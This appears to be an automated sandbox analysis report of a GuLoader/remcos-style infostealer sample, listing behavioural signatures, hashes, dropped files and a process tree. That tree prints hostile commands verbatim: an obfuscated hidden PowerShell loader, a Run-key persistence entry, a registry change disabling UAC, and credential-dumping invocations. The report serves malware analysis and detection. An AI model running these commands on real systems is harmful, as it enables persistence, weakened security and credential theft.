Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/09/2024, 01:21

General

  • Target

    f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7.exe

  • Size

    915KB

  • MD5

    68201a6f398b098b4994a9e5f2d4405c

  • SHA1

    5a39054a39b347e9d294bc42927861692bc03b6b

  • SHA256

    f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7

  • SHA512

    5fc21c049f18297d1d27857dd433a5df77d1bcbc8ecf7ab796ad91443f406355e70159759e519fee313b136ca63179fe2b81fd2f7cdb47868ce5ef9743db6da8

  • SSDEEP

    12288:DBfOreqgPSOONGdVAhCssylYH+ZQnBPmQ8HjWsgrqpqfyl0fGXJ9BqNJowksV3:hOreq0OMAxsyuHdUHjvEO0fG5vq7Hx

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • UAC bypass 3 TTPs 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 7 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7.exe
    "C:\Users\Admin\AppData\Local\Temp\f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3260
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Showpiece44=Get-Content 'C:\Users\Admin\AppData\Local\twinsomeness\Duperingernes.ing';$Subfluid=$Showpiece44.SubString(24464,3);.$Subfluid($Showpiece44)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe
        "C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe"
        3⤵
        • Checks computer location settings
        • Loads dropped DLL
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3224
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "kingrow" /t REG_EXPAND_SZ /d "%Dfa% -windowstyle minimized $Celebrer=(Get-ItemProperty -Path 'HKCU:\Overvre\').Fljtets;%Dfa% ($Celebrer)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1004
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "kingrow" /t REG_EXPAND_SZ /d "%Dfa% -windowstyle minimized $Celebrer=(Get-ItemProperty -Path 'HKCU:\Overvre\').Fljtets;%Dfa% ($Celebrer)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:3648
        • C:\Windows\SysWOW64\cmd.exe
          /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4756
          • C:\Windows\SysWOW64\reg.exe
            C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:3808
        • C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe
          C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe /stext "C:\Users\Admin\AppData\Local\Temp\hredxpy"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4452
        • C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe
          C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe /stext "C:\Users\Admin\AppData\Local\Temp\jljoyhjakz"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:2668
        • C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe
          C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe /stext "C:\Users\Admin\AppData\Local\Temp\unxhzaucyhzrw"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4780

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\remcos\logs.dat

          Filesize

          144B

          MD5

          805b5618beac670ec39d84ed3f03b270

          SHA1

          ffdbb55747b8249318312893dcad3d62157698a7

          SHA256

          1357507bf0a17dbdce3efa60599e82499edd0e729fa9b3ef62560d1728dce68e

          SHA512

          39deaae8cf34443a05e7ca18d74a327eac41aa8a8cdd2538521e66adf416b5ab90373f670fe3a74e358f990d16799cf02c7154b6cd5b323c794a46df2c385e75

        • C:\Users\Admin\AppData\Local\Temp\Raadnetanken.exe

          Filesize

          915KB

          MD5

          68201a6f398b098b4994a9e5f2d4405c

          SHA1

          5a39054a39b347e9d294bc42927861692bc03b6b

          SHA256

          f47cab9eface9209fb0f87cc93b605c08f332f7447389edd831ef7e12f69fbb7

          SHA512

          5fc21c049f18297d1d27857dd433a5df77d1bcbc8ecf7ab796ad91443f406355e70159759e519fee313b136ca63179fe2b81fd2f7cdb47868ce5ef9743db6da8

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0lrsb5dq.okm.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\hredxpy

          Filesize

          4KB

          MD5

          c7ac5a21cac5bd5580a6e28112212613

          SHA1

          0a256177c387053fec680e599bcb63729a16c161

          SHA256

          89e0e7dc8ad418f8613610b71d0c140247e26a5f9a453ee255b1467fb80f15ff

          SHA512

          753675a75b643132e50175d67589a3952cb5154a7e51c11883b2e28bf4fe406afbaed88e61575cc114156e41ed5c587b0f76845e6d20ddf922e775bfff3f0b43

        • C:\Users\Admin\AppData\Local\twinsomeness\Duperingernes.ing

          Filesize

          67KB

          MD5

          f9a33a09287d7157286f38877c443dea

          SHA1

          b4be7206cf4a5de226c3595bea2d4c2d0cbe1ecc

          SHA256

          2b2f4b4baea1491aa69ec9829bb56f92f0d0525aed11a1a117c9942d1e70e0d2

          SHA512

          b3b522b563a2118ae4ab914d63ddc30ef83035ea33642abfcc28b5544167b82124c60feb61fd98186cc3387cab88151a587e85dc894e8a824d9fa7a7bb743252

        • C:\Users\Admin\AppData\Local\twinsomeness\Kasketters.Phy

          Filesize

          357KB

          MD5

          8315fece2c735c00d3bbbeebbe094958

          SHA1

          28a1732cebbdfff364474622f954c5ae30067bc3

          SHA256

          3ab4200bc1e7592168a8eab5ad57af8b98dfb538b5934e8ffd0673531ab2b481

          SHA512

          e0e837e888a6e40c8339fdec8a18dc29ecefadaeef9880b651f3570fa668596cebd3951ba1b14aba6c4cdfa0ce5c2c01dd50cea95911fd5d3ff1eb416d39117c

        • memory/2204-43-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-46-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-13-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-14-0x0000000005140000-0x0000000005162000-memory.dmp

          Filesize

          136KB

        • memory/2204-15-0x0000000005A10000-0x0000000005A76000-memory.dmp

          Filesize

          408KB

        • memory/2204-16-0x0000000005A80000-0x0000000005AE6000-memory.dmp

          Filesize

          408KB

        • memory/2204-26-0x0000000005AF0000-0x0000000005E44000-memory.dmp

          Filesize

          3.3MB

        • memory/2204-27-0x0000000006110000-0x000000000612E000-memory.dmp

          Filesize

          120KB

        • memory/2204-28-0x0000000006140000-0x000000000618C000-memory.dmp

          Filesize

          304KB

        • memory/2204-29-0x00000000070B0000-0x0000000007146000-memory.dmp

          Filesize

          600KB

        • memory/2204-30-0x0000000006630000-0x000000000664A000-memory.dmp

          Filesize

          104KB

        • memory/2204-31-0x0000000006680000-0x00000000066A2000-memory.dmp

          Filesize

          136KB

        • memory/2204-32-0x0000000007700000-0x0000000007CA4000-memory.dmp

          Filesize

          5.6MB

        • memory/2204-34-0x0000000008330000-0x00000000089AA000-memory.dmp

          Filesize

          6.5MB

        • memory/2204-36-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-37-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-38-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-40-0x000000007401E000-0x000000007401F000-memory.dmp

          Filesize

          4KB

        • memory/2204-41-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-42-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-11-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-44-0x00000000089B0000-0x000000000E2E4000-memory.dmp

          Filesize

          89.2MB

        • memory/2204-45-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-12-0x00000000052E0000-0x0000000005908000-memory.dmp

          Filesize

          6.2MB

        • memory/2204-49-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-51-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-65-0x0000000074010000-0x00000000747C0000-memory.dmp

          Filesize

          7.7MB

        • memory/2204-9-0x000000007401E000-0x000000007401F000-memory.dmp

          Filesize

          4KB

        • memory/2204-10-0x0000000002B10000-0x0000000002B46000-memory.dmp

          Filesize

          216KB

        • memory/2668-74-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/2668-79-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/2668-71-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/2668-77-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/3224-99-0x0000000024620000-0x0000000024639000-memory.dmp

          Filesize

          100KB

        • memory/3224-98-0x0000000024620000-0x0000000024639000-memory.dmp

          Filesize

          100KB

        • memory/3224-95-0x0000000024620000-0x0000000024639000-memory.dmp

          Filesize

          100KB

        • memory/3224-64-0x0000000001AA0000-0x00000000073D4000-memory.dmp

          Filesize

          89.2MB

        • memory/4452-75-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/4452-68-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/4452-92-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/4452-73-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/4780-80-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/4780-82-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/4780-88-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/4780-89-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/4780-83-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB